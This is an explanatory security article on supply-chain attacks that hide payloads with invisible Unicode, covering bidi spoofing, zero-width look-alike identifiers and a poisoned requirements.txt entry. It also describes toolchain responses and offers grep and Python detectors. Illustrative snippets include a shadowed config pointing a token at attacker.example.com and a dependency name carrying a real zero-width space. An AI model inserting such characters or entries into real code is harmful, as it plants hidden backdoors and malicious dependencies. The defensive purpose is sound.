
Invisible Unicode Characters Are a Supply-Chain Attack Vector and Most Repositories Are Not Checking

Source: lobsters

A supply-chain attack documented by Ars Technica this week exploited invisible Unicode characters embedded in source code to smuggle malicious payloads past code review on GitHub and in several package registries. The technique is not new; the underlying mechanics have been understood for years. That is precisely why its use in an active supply-chain campaign is worth examining in detail.

The Unicode Characters That Produce No Glyph

Unicode defines over 140,000 characters. A meaningful subset produce no visible glyph, control bidirectional text flow, or modify how adjacent characters combine without themselves rendering. In document processing, these serve legitimate functions. Bidirectional control characters handle the mixing of right-to-left scripts like Arabic and Hebrew with left-to-right Latin text. Zero-width joiners and non-joiners govern how characters in Devanagari or emoji sequences combine. The byte-order mark signals encoding at the start of a file.

Programming language parsers and compilers accept these characters in most contexts. String literals can contain any Unicode character. Identifiers in Python 3, JavaScript, Rust, and Go permit Unicode letters and, in some implementations, Unicode formatting characters. The result is a persistent gap between what a human reviewer sees rendered in a browser and what the compiler or interpreter processes.
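The gap between rendered text and processed text can be made concrete with Python's standard unicodedata module. The following is a minimal sketch; the sample strings "admin" and the helper name describe are illustrative assumptions, not taken from the reported campaign.

```python
import unicodedata

# Code points mentioned in the text. All belong to general category "Cf"
# (format): they occupy a position in the string but draw no glyph.
SAMPLES = ["\u200b", "\u200d", "\u202e", "\ufeff"]

def describe(ch: str) -> str:
    """Return 'U+XXXX NAME (category)' for a single character."""
    name = unicodedata.name(ch, "<unnamed>")
    return f"U+{ord(ch):04X} {name} ({unicodedata.category(ch)})"

for ch in SAMPLES:
    print(describe(ch))

# Two strings that render identically in most viewers but differ in content.
visible = "admin"
tainted = "ad\u200bmin"  # hypothetical value with an embedded zero width space
print(visible == tainted, len(visible), len(tainted))
```

The comparison is false and the lengths differ by one, which is exactly the information a rendered diff hides.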

Trojan Source and the Bidirectional Spoof

The canonical technical treatment of this attack class appeared in a 2021 paper by Nicholas Boucher and Ross Anderson at the University of Cambridge, catalogued as CVE-2021-42574. They demonstrated that Unicode bidirectional control characters, specifically those in the U+202A-U+202E and U+2066-U+2069 ranges, could be embedded inside string literals and comments to visually reorder source code in ways that make malicious logic appear benign.

The mechanism exploits how text renderers implement the Unicode Bidirectional Algorithm. When a renderer encounters a Right-to-Left Override character (U+202E), it reverses the display order of subsequent characters until a Pop Directional Formatting character (U+202C) closes the scope. The source file contains those characters in their actual byte positions; the renderer repositions them visually. The parser ignores the rendering and processes characters in file order.
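One way to see what the parser sees is to replace each bidirectional control with a visible marker, which keeps the characters in file order. The sketch below assumes the code point ranges listed above; the function names and the sample line are hypothetical.

```python
# Bidirectional controls named in the Trojan Source paper:
# U+202A-U+202E (embeddings, overrides, pop) and U+2066-U+2069 (isolates).
BIDI_CONTROLS = {chr(cp) for cp in range(0x202A, 0x202F)} | {
    chr(cp) for cp in range(0x2066, 0x206A)
}

def reveal_bidi(text: str) -> str:
    """Replace each bidi control with a <U+XXXX> marker, preserving file order."""
    return "".join(
        f"<U+{ord(ch):04X}>" if ch in BIDI_CONTROLS else ch for ch in text
    )

def unclosed_overrides(line: str) -> int:
    """Count embeddings/overrides opened on this line (U+202A, U+202B, U+202D,
    U+202E) that are not closed by U+202C before the line ends."""
    depth = 0
    for ch in line:
        if ch in "\u202a\u202b\u202d\u202e":
            depth += 1
        elif ch == "\u202c" and depth > 0:
            depth -= 1
    return depth

# Hypothetical line: a renderer reverses the text after U+202E,
# while the parser reads the characters exactly as stored.
line = 'access = "user\u202e nimda"'
print(reveal_bidi(line))
print(unclosed_overrides(line))
```

An override left open at the end of a line is a reasonable signal to flag, since ordinary right-to-left text rarely needs one inside source code.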

The paper showed this attack works across C, C++, C#, JavaScript, Java, Python, Rust, and Go. Every language that accepts these characters in source text without rejecting them is potentially affected. A string comparison that looks correct in a diff view may use a value that includes invisible control characters, making the comparison behave differently than any reviewer would expect.

Zero-Width Characters and Identifier Shadowing

Bidirectional spoofing is one variant of this attack class. Zero-width characters introduce a distinct problem: they make two identifiers appear identical while being distinct strings.

config = {"url": "https://api.legitimate.com", "token": get_token()}
confi​g = {"url": "https://attacker.example.com", "token": get_token()}
# The second name contains U+200B (ZERO WIDTH SPACE) between 'confi' and 'g'

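A reviewer reading this diff in a browser sees two declarations of config. They are different variable names. Each later reference binds to whichever name its bytes actually spell, so code that appears to read config may be reading the attacker's copy, and nothing on screen distinguishes the two. Language support varies: Python rejects U+200B inside an identifier with a SyntaxError, while JavaScript's grammar accepts U+200C and U+200D in identifiers, so the snippet above is best read as an illustration of the pattern rather than as working Python.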
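Names that collide visually can be detected by grouping identifiers under a key with format characters removed. This is a rough sketch, not the confusable-skeleton algorithm from the Unicode security standards; visual_key and colliding_names are hypothetical helper names, and the identifier list is assumed to come from whatever parser the project already uses.

```python
import unicodedata
from collections import defaultdict

def visual_key(name: str) -> str:
    """Approximate what a reader sees: drop format (Cf) characters,
    then apply NFKC compatibility normalization."""
    stripped = "".join(ch for ch in name if unicodedata.category(ch) != "Cf")
    return unicodedata.normalize("NFKC", stripped)

def colliding_names(names):
    """Map each visual key to its distinct spellings, keeping only keys
    that have more than one spelling."""
    groups = defaultdict(set)
    for name in names:
        groups[visual_key(name)].add(name)
    return {key: sorted(spellings) for key, spellings in groups.items()
            if len(spellings) > 1}

# Hypothetical identifier list mirroring the example above.
names = ["config", "confi\u200bg", "token"]
collisions = colliding_names(names)
print({key: [ascii(s) for s in spellings] for key, spellings in collisions.items()})
```

Printing with ascii() escapes the invisible character, so the report itself does not suffer from the problem it is reporting.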

The same technique extends directly to dependency manifest files, which is where it becomes a supply-chain weapon:

# requirements.txt
requests==2.28.0
cryptography==41.0.0
boto3​==1.28.0

The third entry contains a zero-width space embedded in the package name. A package registry that does not normalize these characters before resolution treats it as a distinct package identifier. An attacker registers that name in advance with a malicious payload. The install proceeds without error; nothing in the visible diff indicates a problem.
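A manifest check can reject any requirement whose name falls outside the ASCII grammar that PEP 508 defines for project names. The sketch below handles only simple "name==version" style lines; the function name and the simplified line parsing are assumptions, and a real tool would use a full requirements parser.

```python
import re

# Project-name grammar from PEP 508. re.ASCII keeps IGNORECASE from
# matching non-ASCII case variants, so only plain ASCII names pass.
NAME_RE = re.compile(
    r"^([A-Z0-9]|[A-Z0-9][A-Z0-9._-]*[A-Z0-9])$", re.IGNORECASE | re.ASCII
)
# Characters that end the name part of a simple requirement line.
NAME_END_RE = re.compile(r"[=<>!~;\[@\s]")

def suspicious_requirements(text: str):
    """Yield (line_number, name) for lines whose package name is not a
    valid PEP 508 name, which includes names with invisible characters."""
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # blanks, comments, pip options
            continue
        name = NAME_END_RE.split(line, maxsplit=1)[0]
        if not NAME_RE.match(name):
            yield number, name

manifest = (
    "# requirements.txt\n"
    "requests==2.28.0\n"
    "cryptography==41.0.0\n"
    "boto3\u200b==1.28.0\n"
)
for number, name in suspicious_requirements(manifest):
    print(number, ascii(name))
```

Validating against an allowlist grammar is stricter than searching for known-bad characters, because it also rejects invisible code points that a blocklist has not enumerated.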

This is not hypothetical. The npm ecosystem has a long history of typosquatting attacks where slightly-varied package names install malicious code. Invisible characters extend that attack surface from the keyboard layout into the Unicode character space, where the variation is undetectable without explicit tooling.

Why Code Review Fails at This Layer

Code review on GitHub is a visual process mediated by a browser rendering engine. Invisible characters are invisible. Bidirectional control characters actively work against the reviewer by reordering what they see. Neither visual attention nor trained intuition for suspicious code patterns applies to content that the rendering engine removes from view or repositions.

Automated tools face the same problem if they operate on the rendered or normalized text representation. AI-assisted code review tools that process the diff as displayed text will not encounter the invisible characters any more than a human reviewer does, unless they are explicitly designed to audit Unicode composition at the byte level.

CI/CD pipelines introduce another layer of exposure. GitHub Actions configurations are YAML files parsed as Unicode text. Invisible characters in shell commands within a workflow file pass into the shell interpreter verbatim. A malicious contributor with write access, or one who compromises an upstream action or reusable workflow, can inject characters that alter the behavior of CI scripts without any change appearing in a visual diff review. The injected characters might redirect a deployment target, add an outbound request, or exfiltrate environment variables, all while the workflow file appears unchanged to a reviewer.

Compiler and Toolchain Responses

The Trojan Source disclosure prompted responses from several toolchains. GCC added the -Wbidi-chars warning flag, which reports bidirectional control characters in source files. The LLVM project added comparable checks to clang-tidy. Rust 1.56.1, released in response to the disclosure, added lints that flag bidirectional control characters in literals and comments; these lints are denied by default, so affected code fails to compile unless the lint is explicitly relaxed. Python did not change its tokenizer; its maintainers instead documented the issue in PEP 672, an informational guide to Unicode-related security considerations.

Where these checks are warnings rather than errors, a build that does not treat warnings as errors will compile or interpret a malicious file without failing. In the supply-chain context, the attack then succeeds even in repositories that use these compilers, as long as nobody monitors the warning output. Most production pipelines are not configured to fail on Unicode-related compiler warnings.

Go is stricter about identifiers by design: its language specification limits identifiers to Unicode letters, digits, and the underscore, so the compiler rejects a name containing a zero-width or other format character instead of warning about it. That is closer to what the problem requires, though it covers identifiers only, not string literals or comments.

Detection Without Waiting for the Toolchain

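Auditing for invisible characters does not require specialized tools. A GNU grep invocation in Perl-compatible mode covers the majority of the attack surface. PCRE does not accept the \uXXXX escape, so the code points are written as \x{XXXX}, and the command must run in a UTF-8 locale:

grep -rnP '[\x{200B}-\x{200F}\x{202A}-\x{202E}\x{2060}-\x{206F}\x{FEFF}]' ./

This matches the zero-width space, the joiners, and the directional marks (U+200B-U+200F), the bidirectional embedding and override controls (U+202A-U+202E), the invisible formatting characters in the U+2060-U+206F range (which includes the isolate controls U+2066-U+2069), and the byte-order mark U+FEFF wherever it appears, including at the start of a file. Running this as a pre-commit hook or a required CI step adds a gate that catches most of what these attacks use. Because grep exits with status 0 when it finds a match, the CI step has to invert the result to fail the build. Expect a few legitimate hits that need an allowlist: files saved with a leading BOM, emoji sequences joined with U+200D, and right-to-left text in localization files.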
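Where GNU grep with PCRE support is not available, the same audit can be sketched in Python. The code below uses the same code point ranges as the grep pattern, tolerates a byte-order mark only at the very start of a file, and names each character it finds. The function names and the decision to skip the .git directory and non-UTF-8 files are assumptions made for this sketch.

```python
import unicodedata
from pathlib import Path

# Same code point ranges as the grep pattern in the text.
RANGES = [(0x200B, 0x200F), (0x202A, 0x202E), (0x2060, 0x206F), (0xFEFF, 0xFEFF)]

def is_suspicious(ch: str) -> bool:
    cp = ord(ch)
    return any(lo <= cp <= hi for lo, hi in RANGES)

def scan_text(text: str):
    """Yield (line, column, 'U+XXXX NAME') for each suspicious character.
    A BOM at offset 0 is allowed and removed before scanning."""
    if text.startswith("\ufeff"):
        text = text[1:]
    for line_no, line in enumerate(text.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if is_suspicious(ch):
                label = f"U+{ord(ch):04X} {unicodedata.name(ch, 'UNNAMED')}"
                yield line_no, col, label

def scan_tree(root: str) -> int:
    """Scan every UTF-8 decodable file under root; return the finding count."""
    findings = 0
    for path in Path(root).rglob("*"):
        if not path.is_file() or ".git" in path.parts:
            continue
        try:
            text = path.read_text(encoding="utf-8")
        except (UnicodeDecodeError, OSError):
            continue  # binary or unreadable files are out of scope here
        for line_no, col, label in scan_text(text):
            print(f"{path}:{line_no}:{col}: {label}")
            findings += 1
    return findings
```

A CI wrapper would call scan_tree(".") and exit with a nonzero status when the returned count is greater than zero.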

GitHub’s code scanning supports custom CodeQL queries, and community-contributed rules targeting Trojan Source variants are available. Unicode Technical Standard #39, Unicode Security Mechanisms, from the Unicode Consortium defines a set of confusable character categories and provides a basis for more comprehensive detection. The npm security team and PyPI’s malware detection pipeline have added pattern matching for suspicious Unicode in submitted packages, though coverage is not comprehensive and does not apply retroactively to existing versions.

For repositories that accept contributions from external parties, adding the grep check to the CI pipeline is a one-line addition that closes a significant portion of this attack surface. Most repositories have not done it.

The Structural Problem

The reason this attack class persists after years of awareness is that it exploits a genuine feature of a necessary standard. Blocking all Unicode formatting characters in source code would break legitimate internationalized software. The correct boundary is to reject these characters in identifier and comment positions while permitting them in string data, which requires tooling that understands syntactic context. Most security scanners do not implement that distinction.
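For Python sources, the standard tokenize module is one way to get the syntactic context this distinction needs. The sketch below labels each format character by whether it sits in a comment or a string token, so a policy can reject the first and review or permit the second. The function name and the sample line are hypothetical, and f-strings on Python 3.12 and later are emitted as separate token types that this sketch does not inspect.

```python
import io
import tokenize
import unicodedata

def format_chars_by_context(source: str):
    """Return (line, context, 'U+XXXX') for every format (Cf) character
    found inside a comment or string token of Python source text."""
    findings = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type == tokenize.COMMENT:
            context = "comment"
        elif tok.type == tokenize.STRING:
            context = "string"
        else:
            continue
        for ch in tok.string:
            if unicodedata.category(ch) == "Cf":
                findings.append((tok.start[0], context, f"U+{ord(ch):04X}"))
    return findings

# Hypothetical line: a joiner inside string data, an override inside a comment.
sample = 'label = "a\u200db"  # note\u202e\n'
findings = format_chars_by_context(sample)

# Policy from the text: reject in comments, permit in string data.
rejected = [f for f in findings if f[1] == "comment"]
print(findings)
print(rejected)
```

Identifier positions need no separate check in this sketch, since Python itself refuses format characters such as U+200B inside names.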

Package registries could enforce stricter pre-publication checks, normalizing package names and rejecting uploads containing invisible characters in executable code. Language toolchains could default these warnings to errors in new projects. GitHub already shows a warning banner on files that contain bidirectional control characters; it could extend that treatment to zero-width and other invisible characters in the diff view instead of rendering them transparently. The engineering for all of these exists; none of it requires research that has not already been done.

The supply-chain campaign documented this week is consistent with what security researchers predicted after the Trojan Source disclosure. The gap is known, the mitigations are available, and the attackers are using the gap while the ecosystem moves slowly toward closing it. The question for any team that maintains open source software is whether a Unicode character audit is part of their contribution review. In most cases, it is not.
